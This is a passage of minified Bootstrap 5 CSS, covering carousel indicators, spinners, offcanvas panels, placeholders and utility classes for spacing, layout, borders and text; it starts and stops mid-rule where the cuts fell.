0-.708z'/%3e%3c/svg%3e")}.carousel-indicators{position:absolute;right:0;bottom:0;left:0;z-index:2;display:flex;justify-content:center;padding:0;margin-right:15%;margin-bottom:1rem;margin-left:15%;list-style:none}.carousel-indicators [data-bs-target]{box-sizing:content-box;flex:0 1 auto;width:30px;height:3px;padding:0;margin-right:3px;margin-left:3px;text-indent:-999px;cursor:pointer;background-color:#fff;background-clip:padding-box;border:0;border-top:10px solid transparent;border-bottom:10px solid transparent;opacity:.5;transition:opacity .6s ease}@media (prefers-reduced-motion:reduce){.carousel-indicators [data-bs-target]{transition:none}}.carousel-indicators .active{opacity:1}.carousel-caption{position:absolute;right:15%;bottom:1.25rem;left:15%;padding-top:1.25rem;padding-bottom:1.25rem;color:#fff;text-align:center}.carousel-dark .carousel-control-next-icon,.carousel-dark .carousel-control-prev-icon{filter:invert(1) grayscale(100)}.carousel-dark .carousel-indicators [data-bs-target]{background-color:#000}.carousel-dark .carousel-caption{color:#000}.spinner-border,.spinner-grow{display:inline-block;width:var(--bs-spinner-width);height:var(--bs-spinner-height);vertical-align:var(--bs-spinner-vertical-align);border-radius:50%;animation:var(--bs-spinner-animation-speed) linear infinite var(--bs-spinner-animation-name)}@keyframes spinner-border{to{transform:rotate(360deg)}}.spinner-border{--bs-spinner-width:2rem;--bs-spinner-height:2rem;--bs-spinner-vertical-align:-0.125em;--bs-spinner-border-width:0.25em;--bs-spinner-animation-speed:0.75s;--bs-spinner-animation-name:spinner-border;border:var(--bs-spinner-border-width) solid currentcolor;border-right-color:transparent}.spinner-border-sm{--bs-spinner-width:1rem;--bs-spinner-height:1rem;--bs-spinner-border-width:0.2em}@keyframes spinner-grow{0%{transform:scale(0)}50%{opacity:1;transform:none}}.spinner-grow{--bs-spinner-width:2rem;--bs-spinner-height:2rem;--bs-spinner-vertical-align:-0.125em;--bs-spinner-animation-speed:0.75s;--bs-spinner-animation-name:spinner-grow;background-color:currentcolor;opacity:0}.spinner-grow-sm{--bs-spinner-width:1rem;--bs-spinner-height:1rem}@media (prefers-reduced-motion:reduce){.spinner-border,.spinner-grow{--bs-spinner-animation-speed:1.5s}}.offcanvas,.offcanvas-lg,.offcanvas-md,.offcanvas-sm,.offcanvas-xl,.offcanvas-xxl{--bs-offcanvas-zindex:1045;--bs-offcanvas-width:400px;--bs-offcanvas-height:30vh;--bs-offcanvas-padding-x:1rem;--bs-offcanvas-padding-y:1rem;--bs-offcanvas-color: ;--bs-offcanvas-bg:#fff;--bs-offcanvas-border-width:1px;--bs-offcanvas-border-color:var(--bs-border-color-translucent);--bs-offcanvas-box-shadow:0 0.125rem 0.25rem rgba(0, 0, 0, 0.075)}@media (max-width:575.98px){.offcanvas-sm{position:fixed;bottom:0;z-index:var(--bs-offcanvas-zindex);display:flex;flex-direction:column;max-width:100%;color:var(--bs-offcanvas-color);visibility:hidden;background-color:var(--bs-offcanvas-bg);background-clip:padding-box;outline:0;transition:transform .3s ease-in-out}}@media (max-width:575.98px) and (prefers-reduced-motion:reduce){.offcanvas-sm{transition:none}}@media (max-width:575.98px){.offcanvas-sm.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}}@media (max-width:575.98px){.offcanvas-sm.offcanvas-end{top:0;right:0;width:var(--bs-offcanvas-width);border-left:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(100%)}}@media (max-width:575.98px){.offcanvas-sm.offcanvas-top{top:0;right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-bottom:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(-100%)}}@media (max-width:575.98px){.offcanvas-sm.offcanvas-bottom{right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-top:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(100%)}}@media (max-width:575.98px){.offcanvas-sm.show:not(.hiding),.offcanvas-sm.showing{transform:none}}@media (max-width:575.98px){.offcanvas-sm.hiding,.offcanvas-sm.show,.offcanvas-sm.showing{visibility:visible}}@media (min-width:576px){.offcanvas-sm{--bs-offcanvas-height:auto;--bs-offcanvas-border-width:0;background-color:transparent!important}.offcanvas-sm .offcanvas-header{display:none}.offcanvas-sm .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible;background-color:transparent!important}}@media (max-width:767.98px){.offcanvas-md{position:fixed;bottom:0;z-index:var(--bs-offcanvas-zindex);display:flex;flex-direction:column;max-width:100%;color:var(--bs-offcanvas-color);visibility:hidden;background-color:var(--bs-offcanvas-bg);background-clip:padding-box;outline:0;transition:transform .3s ease-in-out}}@media (max-width:767.98px) and (prefers-reduced-motion:reduce){.offcanvas-md{transition:none}}@media (max-width:767.98px){.offcanvas-md.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}}@media (max-width:767.98px){.offcanvas-md.offcanvas-end{top:0;right:0;width:var(--bs-offcanvas-width);border-left:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(100%)}}@media (max-width:767.98px){.offcanvas-md.offcanvas-top{top:0;right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-bottom:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(-100%)}}@media (max-width:767.98px){.offcanvas-md.offcanvas-bottom{right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-top:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(100%)}}@media (max-width:767.98px){.offcanvas-md.show:not(.hiding),.offcanvas-md.showing{transform:none}}@media (max-width:767.98px){.offcanvas-md.hiding,.offcanvas-md.show,.offcanvas-md.showing{visibility:visible}}@media (min-width:768px){.offcanvas-md{--bs-offcanvas-height:auto;--bs-offcanvas-border-width:0;background-color:transparent!important}.offcanvas-md .offcanvas-header{display:none}.offcanvas-md .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible;background-color:transparent!important}}@media (max-width:991.98px){.offcanvas-lg{position:fixed;bottom:0;z-index:var(--bs-offcanvas-zindex);display:flex;flex-direction:column;max-width:100%;color:var(--bs-offcanvas-color);visibility:hidden;background-color:var(--bs-offcanvas-bg);background-clip:padding-box;outline:0;transition:transform .3s ease-in-out}}@media (max-width:991.98px) and (prefers-reduced-motion:reduce){.offcanvas-lg{transition:none}}@media (max-width:991.98px){.offcanvas-lg.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}}@media (max-width:991.98px){.offcanvas-lg.offcanvas-end{top:0;right:0;width:var(--bs-offcanvas-width);border-left:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(100%)}}@media (max-width:991.98px){.offcanvas-lg.offcanvas-top{top:0;right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-bottom:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(-100%)}}@media (max-width:991.98px){.offcanvas-lg.offcanvas-bottom{right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-top:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(100%)}}@media (max-width:991.98px){.offcanvas-lg.show:not(.hiding),.offcanvas-lg.showing{transform:none}}@media (max-width:991.98px){.offcanvas-lg.hiding,.offcanvas-lg.show,.offcanvas-lg.showing{visibility:visible}}@media (min-width:992px){.offcanvas-lg{--bs-offcanvas-height:auto;--bs-offcanvas-border-width:0;background-color:transparent!important}.offcanvas-lg .offcanvas-header{display:none}.offcanvas-lg .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible;background-color:transparent!important}}@media (max-width:1199.98px){.offcanvas-xl{position:fixed;bottom:0;z-index:var(--bs-offcanvas-zindex);display:flex;flex-direction:column;max-width:100%;color:var(--bs-offcanvas-color);visibility:hidden;background-color:var(--bs-offcanvas-bg);background-clip:padding-box;outline:0;transition:transform .3s ease-in-out}}@media (max-width:1199.98px) and (prefers-reduced-motion:reduce){.offcanvas-xl{transition:none}}@media (max-width:1199.98px){.offcanvas-xl.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}}@media (max-width:1199.98px){.offcanvas-xl.offcanvas-end{top:0;right:0;width:var(--bs-offcanvas-width);border-left:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(100%)}}@media (max-width:1199.98px){.offcanvas-xl.offcanvas-top{top:0;right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-bottom:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(-100%)}}@media (max-width:1199.98px){.offcanvas-xl.offcanvas-bottom{right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-top:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(100%)}}@media (max-width:1199.98px){.offcanvas-xl.show:not(.hiding),.offcanvas-xl.showing{transform:none}}@media (max-width:1199.98px){.offcanvas-xl.hiding,.offcanvas-xl.show,.offcanvas-xl.showing{visibility:visible}}@media (min-width:1200px){.offcanvas-xl{--bs-offcanvas-height:auto;--bs-offcanvas-border-width:0;background-color:transparent!important}.offcanvas-xl .offcanvas-header{display:none}.offcanvas-xl .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible;background-color:transparent!important}}@media (max-width:1399.98px){.offcanvas-xxl{position:fixed;bottom:0;z-index:var(--bs-offcanvas-zindex);display:flex;flex-direction:column;max-width:100%;color:var(--bs-offcanvas-color);visibility:hidden;background-color:var(--bs-offcanvas-bg);background-clip:padding-box;outline:0;transition:transform .3s ease-in-out}}@media (max-width:1399.98px) and (prefers-reduced-motion:reduce){.offcanvas-xxl{transition:none}}@media (max-width:1399.98px){.offcanvas-xxl.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}}@media (max-width:1399.98px){.offcanvas-xxl.offcanvas-end{top:0;right:0;width:var(--bs-offcanvas-width);border-left:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(100%)}}@media (max-width:1399.98px){.offcanvas-xxl.offcanvas-top{top:0;right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-bottom:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(-100%)}}@media (max-width:1399.98px){.offcanvas-xxl.offcanvas-bottom{right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-top:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(100%)}}@media (max-width:1399.98px){.offcanvas-xxl.show:not(.hiding),.offcanvas-xxl.showing{transform:none}}@media (max-width:1399.98px){.offcanvas-xxl.hiding,.offcanvas-xxl.show,.offcanvas-xxl.showing{visibility:visible}}@media (min-width:1400px){.offcanvas-xxl{--bs-offcanvas-height:auto;--bs-offcanvas-border-width:0;background-color:transparent!important}.offcanvas-xxl .offcanvas-header{display:none}.offcanvas-xxl .offcanvas-body{display:flex;flex-grow:0;padding:0;overflow-y:visible;background-color:transparent!important}}.offcanvas{position:fixed;bottom:0;z-index:var(--bs-offcanvas-zindex);display:flex;flex-direction:column;max-width:100%;color:var(--bs-offcanvas-color);visibility:hidden;background-color:var(--bs-offcanvas-bg);background-clip:padding-box;outline:0;transition:transform .3s ease-in-out}@media (prefers-reduced-motion:reduce){.offcanvas{transition:none}}.offcanvas.offcanvas-start{top:0;left:0;width:var(--bs-offcanvas-width);border-right:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(-100%)}.offcanvas.offcanvas-end{top:0;right:0;width:var(--bs-offcanvas-width);border-left:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateX(100%)}.offcanvas.offcanvas-top{top:0;right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-bottom:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(-100%)}.offcanvas.offcanvas-bottom{right:0;left:0;height:var(--bs-offcanvas-height);max-height:100%;border-top:var(--bs-offcanvas-border-width) solid var(--bs-offcanvas-border-color);transform:translateY(100%)}.offcanvas.show:not(.hiding),.offcanvas.showing{transform:none}.offcanvas.hiding,.offcanvas.show,.offcanvas.showing{visibility:visible}.offcanvas-backdrop{position:fixed;top:0;left:0;z-index:1040;width:100vw;height:100vh;background-color:#000}.offcanvas-backdrop.fade{opacity:0}.offcanvas-backdrop.show{opacity:.5}.offcanvas-header{display:flex;align-items:center;justify-content:space-between;padding:var(--bs-offcanvas-padding-y) var(--bs-offcanvas-padding-x)}.offcanvas-header .btn-close{padding:calc(var(--bs-offcanvas-padding-y) * .5) calc(var(--bs-offcanvas-padding-x) * .5);margin-top:calc(-.5 * var(--bs-offcanvas-padding-y));margin-right:calc(-.5 * var(--bs-offcanvas-padding-x));margin-bottom:calc(-.5 * var(--bs-offcanvas-padding-y))}.offcanvas-title{margin-bottom:0;line-height:1.5}.offcanvas-body{flex-grow:1;padding:var(--bs-offcanvas-padding-y) var(--bs-offcanvas-padding-x);overflow-y:auto}.placeholder{display:inline-block;min-height:1em;vertical-align:middle;cursor:wait;background-color:currentcolor;opacity:.5}.placeholder.btn::before{display:inline-block;content:""}.placeholder-xs{min-height:.6em}.placeholder-sm{min-height:.8em}.placeholder-lg{min-height:1.2em}.placeholder-glow .placeholder{animation:placeholder-glow 2s ease-in-out infinite}@keyframes placeholder-glow{50%{opacity:.2}}.placeholder-wave{-webkit-mask-image:linear-gradient(130deg,#000 55%,rgba(0,0,0,0.8) 75%,#000 95%);mask-image:linear-gradient(130deg,#000 55%,rgba(0,0,0,0.8) 75%,#000 95%);-webkit-mask-size:200% 100%;mask-size:200% 100%;animation:placeholder-wave 2s linear infinite}@keyframes placeholder-wave{100%{-webkit-mask-position:-200% 0%;mask-position:-200% 0%}}.clearfix::after{display:block;clear:both;content:""}.text-bg-primary{color:#fff!important;background-color:RGBA(13,110,253,var(--bs-bg-opacity,1))!important}.text-bg-secondary{color:#fff!important;background-color:RGBA(108,117,125,var(--bs-bg-opacity,1))!important}.text-bg-success{color:#fff!important;background-color:RGBA(25,135,84,var(--bs-bg-opacity,1))!important}.text-bg-info{color:#000!important;background-color:RGBA(13,202,240,var(--bs-bg-opacity,1))!important}.text-bg-warning{color:#000!important;background-color:RGBA(255,193,7,var(--bs-bg-opacity,1))!important}.text-bg-danger{color:#fff!important;background-color:RGBA(220,53,69,var(--bs-bg-opacity,1))!important}.text-bg-light{color:#000!important;background-color:RGBA(248,249,250,var(--bs-bg-opacity,1))!important}.text-bg-dark{color:#fff!important;background-color:RGBA(33,37,41,var(--bs-bg-opacity,1))!important}.link-primary{color:#0d6efd!important}.link-primary:focus,.link-primary:hover{color:#0a58ca!important}.link-secondary{color:#6c757d!important}.link-secondary:focus,.link-secondary:hover{color:#565e64!important}.link-success{color:#198754!important}.link-success:focus,.link-success:hover{color:#146c43!important}.link-info{color:#0dcaf0!important}.link-info:focus,.link-info:hover{color:#3dd5f3!important}.link-warning{color:#ffc107!important}.link-warning:focus,.link-warning:hover{color:#ffcd39!important}.link-danger{color:#dc3545!important}.link-danger:focus,.link-danger:hover{color:#b02a37!important}.link-light{color:#f8f9fa!important}.link-light:focus,.link-light:hover{color:#f9fafb!important}.link-dark{color:#212529!important}.link-dark:focus,.link-dark:hover{color:#1a1e21!important}.ratio{position:relative;width:100%}.ratio::before{display:block;padding-top:var(--bs-aspect-ratio);content:""}.ratio>*{position:absolute;top:0;left:0;width:100%;height:100%}.ratio-1x1{--bs-aspect-ratio:100%}.ratio-4x3{--bs-aspect-ratio:75%}.ratio-16x9{--bs-aspect-ratio:56.25%}.ratio-21x9{--bs-aspect-ratio:42.8571428571%}.fixed-top{position:fixed;top:0;right:0;left:0;z-index:1030}.fixed-bottom{position:fixed;right:0;bottom:0;left:0;z-index:1030}.sticky-top{position:-webkit-sticky;position:sticky;top:0;z-index:1020}.sticky-bottom{position:-webkit-sticky;position:sticky;bottom:0;z-index:1020}@media (min-width:576px){.sticky-sm-top{position:-webkit-sticky;position:sticky;top:0;z-index:1020}.sticky-sm-bottom{position:-webkit-sticky;position:sticky;bottom:0;z-index:1020}}@media (min-width:768px){.sticky-md-top{position:-webkit-sticky;position:sticky;top:0;z-index:1020}.sticky-md-bottom{position:-webkit-sticky;position:sticky;bottom:0;z-index:1020}}@media (min-width:992px){.sticky-lg-top{position:-webkit-sticky;position:sticky;top:0;z-index:1020}.sticky-lg-bottom{position:-webkit-sticky;position:sticky;bottom:0;z-index:1020}}@media (min-width:1200px){.sticky-xl-top{position:-webkit-sticky;position:sticky;top:0;z-index:1020}.sticky-xl-bottom{position:-webkit-sticky;position:sticky;bottom:0;z-index:1020}}@media (min-width:1400px){.sticky-xxl-top{position:-webkit-sticky;position:sticky;top:0;z-index:1020}.sticky-xxl-bottom{position:-webkit-sticky;position:sticky;bottom:0;z-index:1020}}.hstack{display:flex;flex-direction:row;align-items:center;align-self:stretch}.vstack{display:flex;flex:1 1 auto;flex-direction:column;align-self:stretch}.visually-hidden,.visually-hidden-focusable:not(:focus):not(:focus-within){position:absolute!important;width:1px!important;height:1px!important;padding:0!important;margin:-1px!important;overflow:hidden!important;clip:rect(0,0,0,0)!important;white-space:nowrap!important;border:0!important}.stretched-link::after{position:absolute;top:0;right:0;bottom:0;left:0;z-index:1;content:""}.text-truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.vr{display:inline-block;align-self:stretch;width:1px;min-height:1em;background-color:currentcolor;opacity:.25}.align-baseline{vertical-align:baseline!important}.align-top{vertical-align:top!important}.align-middle{vertical-align:middle!important}.align-bottom{vertical-align:bottom!important}.align-text-bottom{vertical-align:text-bottom!important}.align-text-top{vertical-align:text-top!important}.float-start{float:left!important}.float-end{float:right!important}.float-none{float:none!important}.opacity-0{opacity:0!important}.opacity-25{opacity:.25!important}.opacity-50{opacity:.5!important}.opacity-75{opacity:.75!important}.opacity-100{opacity:1!important}.overflow-auto{overflow:auto!important}.overflow-hidden{overflow:hidden!important}.overflow-visible{overflow:visible!important}.overflow-scroll{overflow:scroll!important}.d-inline{display:inline!important}.d-inline-block{display:inline-block!important}.d-block{display:block!important}.d-grid{display:grid!important}.d-table{display:table!important}.d-table-row{display:table-row!important}.d-table-cell{display:table-cell!important}.d-flex{display:flex!important}.d-inline-flex{display:inline-flex!important}.d-none{display:none!important}.shadow{box-shadow:0 .5rem 1rem rgba(0,0,0,.15)!important}.shadow-sm{box-shadow:0 .125rem .25rem rgba(0,0,0,.075)!important}.shadow-lg{box-shadow:0 1rem 3rem rgba(0,0,0,.175)!important}.shadow-none{box-shadow:none!important}.position-static{position:static!important}.position-relative{position:relative!important}.position-absolute{position:absolute!important}.position-fixed{position:fixed!important}.position-sticky{position:-webkit-sticky!important;position:sticky!important}.top-0{top:0!important}.top-50{top:50%!important}.top-100{top:100%!important}.bottom-0{bottom:0!important}.bottom-50{bottom:50%!important}.bottom-100{bottom:100%!important}.start-0{left:0!important}.start-50{left:50%!important}.start-100{left:100%!important}.end-0{right:0!important}.end-50{right:50%!important}.end-100{right:100%!important}.translate-middle{transform:translate(-50%,-50%)!important}.translate-middle-x{transform:translateX(-50%)!important}.translate-middle-y{transform:translateY(-50%)!important}.border{border:var(--bs-border-width) var(--bs-border-style) var(--bs-border-color)!important}.border-0{border:0!important}.border-top{border-top:var(--bs-border-width) var(--bs-border-style) var(--bs-border-color)!important}.border-top-0{border-top:0!important}.border-end{border-right:var(--bs-border-width) var(--bs-border-style) var(--bs-border-color)!important}.border-end-0{border-right:0!important}.border-bottom{border-bottom:var(--bs-border-width) var(--bs-border-style) var(--bs-border-color)!important}.border-bottom-0{border-bottom:0!important}.border-start{border-left:var(--bs-border-width) var(--bs-border-style) var(--bs-border-color)!important}.border-start-0{border-left:0!important}.border-primary{--bs-border-opacity:1;border-color:rgba(var(--bs-primary-rgb),var(--bs-border-opacity))!important}.border-secondary{--bs-border-opacity:1;border-color:rgba(var(--bs-secondary-rgb),var(--bs-border-opacity))!important}.border-success{--bs-border-opacity:1;border-color:rgba(var(--bs-success-rgb),var(--bs-border-opacity))!important}.border-info{--bs-border-opacity:1;border-color:rgba(var(--bs-info-rgb),var(--bs-border-opacity))!important}.border-warning{--bs-border-opacity:1;border-color:rgba(var(--bs-warning-rgb),var(--bs-border-opacity))!important}.border-danger{--bs-border-opacity:1;border-color:rgba(var(--bs-danger-rgb),var(--bs-border-opacity))!important}.border-light{--bs-border-opacity:1;border-color:rgba(var(--bs-light-rgb),var(--bs-border-opacity))!important}.border-dark{--bs-border-opacity:1;border-color:rgba(var(--bs-dark-rgb),var(--bs-border-opacity))!important}.border-white{--bs-border-opacity:1;border-color:rgba(var(--bs-white-rgb),var(--bs-border-opacity))!important}.border-1{--bs-border-width:1px}.border-2{--bs-border-width:2px}.border-3{--bs-border-width:3px}.border-4{--bs-border-width:4px}.border-5{--bs-border-width:5px}.border-opacity-10{--bs-border-opacity:0.1}.border-opacity-25{--bs-border-opacity:0.25}.border-opacity-50{--bs-border-opacity:0.5}.border-opacity-75{--bs-border-opacity:0.75}.border-opacity-100{--bs-border-opacity:1}.w-25{width:25%!important}.w-50{width:50%!important}.w-75{width:75%!important}.w-100{width:100%!important}.w-auto{width:auto!important}.mw-100{max-width:100%!important}.vw-100{width:100vw!important}.min-vw-100{min-width:100vw!important}.h-25{height:25%!important}.h-50{height:50%!important}.h-75{height:75%!important}.h-100{height:100%!important}.h-auto{height:auto!important}.mh-100{max-height:100%!important}.vh-100{height:100vh!important}.min-vh-100{min-height:100vh!important}.flex-fill{flex:1 1 auto!important}.flex-row{flex-direction:row!important}.flex-column{flex-direction:column!important}.flex-row-reverse{flex-direction:row-reverse!important}.flex-column-reverse{flex-direction:column-reverse!important}.flex-grow-0{flex-grow:0!important}.flex-grow-1{flex-grow:1!important}.flex-shrink-0{flex-shrink:0!important}.flex-shrink-1{flex-shrink:1!important}.flex-wrap{flex-wrap:wrap!important}.flex-nowrap{flex-wrap:nowrap!important}.flex-wrap-reverse{flex-wrap:wrap-reverse!important}.justify-content-start{justify-content:flex-start!important}.justify-content-end{justify-content:flex-end!important}.justify-content-center{justify-content:center!important}.justify-content-between{justify-content:space-between!important}.justify-content-around{justify-content:space-around!important}.justify-content-evenly{justify-content:space-evenly!important}.align-items-start{align-items:flex-start!important}.align-items-end{align-items:flex-end!important}.align-items-center{align-items:center!important}.align-items-baseline{align-items:baseline!important}.align-items-stretch{align-items:stretch!important}.align-content-start{align-content:flex-start!important}.align-content-end{align-content:flex-end!important}.align-content-center{align-content:center!important}.align-content-between{align-content:space-between!important}.align-content-around{align-content:space-around!important}.align-content-stretch{align-content:stretch!important}.align-self-auto{align-self:auto!important}.align-self-start{align-self:flex-start!important}.align-self-end{align-self:flex-end!important}.align-self-center{align-self:center!important}.align-self-baseline{align-self:baseline!important}.align-self-stretch{align-self:stretch!important}.order-first{order:-1!important}.order-0{order:0!important}.order-1{order:1!important}.order-2{order:2!important}.order-3{order:3!important}.order-4{order:4!important}.order-5{order:5!important}.order-last{order:6!important}.m-0{margin:0!important}.m-1{margin:.25rem!important}.m-2{margin:.5rem!important}.m-3{margin:1rem!important}.m-4{margin:1.5rem!important}.m-5{margin:3rem!important}.m-auto{margin:auto!important}.mx-0{margin-right:0!important;margin-left:0!important}.mx-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-3{margin-right:1rem!important;margin-left:1rem!important}.mx-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-5{margin-right:3rem!important;margin-left:3rem!important}.mx-auto{margin-right:auto!important;margin-left:auto!important}.my-0{margin-top:0!important;margin-bottom:0!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-0{margin-top:0!important}.mt-1{margin-top:.25rem!important}.mt-2{margin-top:.5rem!important}.mt-3{margin-top:1rem!important}.mt-4{margin-top:1.5rem!important}.mt-5{margin-top:3rem!important}.mt-auto{margin-top:auto!important}.me-0{margin-right:0!important}.me-1{margin-right:.25rem!important}.me-2{margin-right:.5rem!important}.me-3{margin-right:1rem!important}.me-4{margin-right:1.5rem!important}.me-5{margin-right:3rem!important}.me-auto{margin-right:auto!important}.mb-0{margin-bottom:0!important}.mb-1{margin-bottom:.25rem!important}.mb-2{margin-bottom:.5rem!important}.mb-3{margin-bottom:1rem!important}.mb-4{margin-bottom:1.5rem!important}.mb-5{margin-bottom:3rem!important}.mb-auto{margin-bottom:auto!important}.ms-0{margin-left:0!important}.ms-1{margin-left:.25rem!important}.ms-2{margin-left:.5rem!important}.ms-3{margin-left:1rem!important}.ms-4{margin-left:1.5rem!important}.ms-5{margin-left:3rem!important}.ms-auto{margin-left:auto!important}.p-0{padding:0!important}.p-1{padding:.25rem!important}.p-2{padding:.5rem!important}.p-3{padding:1rem!important}.p-4{padding:1.5rem!important}.p-5{padding:3rem!important}.px-0{padding-right:0!important;padding-left:0!important}.px-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-3{padding-right:1rem!important;padding-left:1rem!important}.px-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-5{padding-right:3rem!important;padding-left:3rem!important}.py-0{padding-top:0!important;padding-bottom:0!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-0{padding-top:0!important}.pt-1{padding-top:.25rem!important}.pt-2{padding-top:.5rem!important}.pt-3{padding-top:1rem!important}.pt-4{padding-top:1.5rem!important}.pt-5{padding-top:3rem!important}.pe-0{padding-right:0!important}.pe-1{padding-right:.25rem!important}.pe-2{padding-right:.5rem!important}.pe-3{padding-right:1rem!important}.pe-4{padding-right:1.5rem!important}.pe-5{padding-right:3rem!important}.pb-0{padding-bottom:0!important}.pb-1{padding-bottom:.25rem!important}.pb-2{padding-bottom:.5rem!important}.pb-3{padding-bottom:1rem!important}.pb-4{padding-bottom:1.5rem!important}.pb-5{padding-bottom:3rem!important}.ps-0{padding-left:0!important}.ps-1{padding-left:.25rem!important}.ps-2{padding-left:.5rem!important}.ps-3{padding-left:1rem!important}.ps-4{padding-left:1.5rem!important}.ps-5{padding-left:3rem!important}.gap-0{gap:0!important}.gap-1{gap:.25rem!important}.gap-2{gap:.5rem!important}.gap-3{gap:1rem!important}.gap-4{gap:1.5rem!important}.gap-5{gap:3rem!important}.font-monospace{font-family:var(--bs-font-monospace)!important}.fs-1{font-size:calc(1.375rem + 1.5vw)!important}.fs-2{font-size:calc(1.325rem + .9vw)!important}.fs-3{font-size:calc(1.3rem + .6vw)!important}.fs-4{font-size:calc(1.275rem + .3vw)!important}.fs-5{font-size:1.25rem!important}.fs-6{font-size:1rem!important}.fst-italic{font-style:italic!important}.fst-normal{font-style:normal!important}.fw-light{font-weight:300!important}.fw-lighter{font-weight:lighter!important}.fw-normal{font-weight:400!important}.fw-bold{font-weight:700!important}.fw-semibold{font-weight:600!important}.fw-bolder{font-weight:bolder!important}.lh-1{line-height:1!important}.lh-sm{line-height:1.25!important}.lh-base{line-height:1.5!important}.lh-lg{line-height:2!important}.text-start{text-align:left!important}.text-end{text-align:right!important}.text-center{text-align:center!important}.text-decoration-none{text-decoration:none!important}.text-decoration-underline{text-decoration:underline!important}.text-decoration-line-through{text-decoration:line-through!important}.text-lowercase{text-transform:lowercase!important}.text-uppercase{text-transform:uppercase!important}.text-capitalize{text-transform:capitalize!important}.text-wrap{white-space:normal!important}.text-nowrap{white-space:nowrap!important}.text-break{word-wrap:break-word!important;word-break:break-word!important}.text-primary{--bs-text-opacity:1;color:rgba(var(--bs-primary-rgb),var(--bs-text-opacity))!important}.text-secondary{--bs-text-opacity:1;color:rgba(var(--bs-secondary-rgb),var(--bs-text-opacity))!important}.text-success{--bs-text-opacity:1;color:rgba(var(--bs-success-rgb),var(--bs-text-opacity))!important}.text-info{--bs-text-opacity:1;color:rgba(var(--bs-info-rgb),var(--bs-text-opacity))!important}.text-warning{--bs-text-opacity:1;color:rgba(var(--bs-warning-rgb),var(--bs-text-opacity))!important}.text-danger{--bs-text-opacity:1;color:rgba(var(--bs-danger-rgb),var(--bs-text-opacity))!important}.text-light{--bs-text-opacity:1;color:rgba(var(--bs-light-rgb),var(--bs-text-opacity))!important}.text-dark{--bs-text-opacity:1;color:rgba(var(--bs-dark-rgb),var(--bs-text-opacity))!important}.text-black{--bs-text-opacity:1;color:rgba(var(--bs-black-rgb),var(--bs-text-opacity))!important}.text-white{--bs-text-opacity:1;color:rgba(var(--bs-white-rgb),var(--bs-text-opacity))!important}.text-body{--bs-text-opacity:1;color:rgba(var(--bs-body-color-rgb),var(--bs-text-opacity))!important}.text-muted{--bs-text-opacity:1;color:#6c757d!important}.text-black-50{--bs-text-opacity:1;color:rgba(0,0,0,.5)!important}.t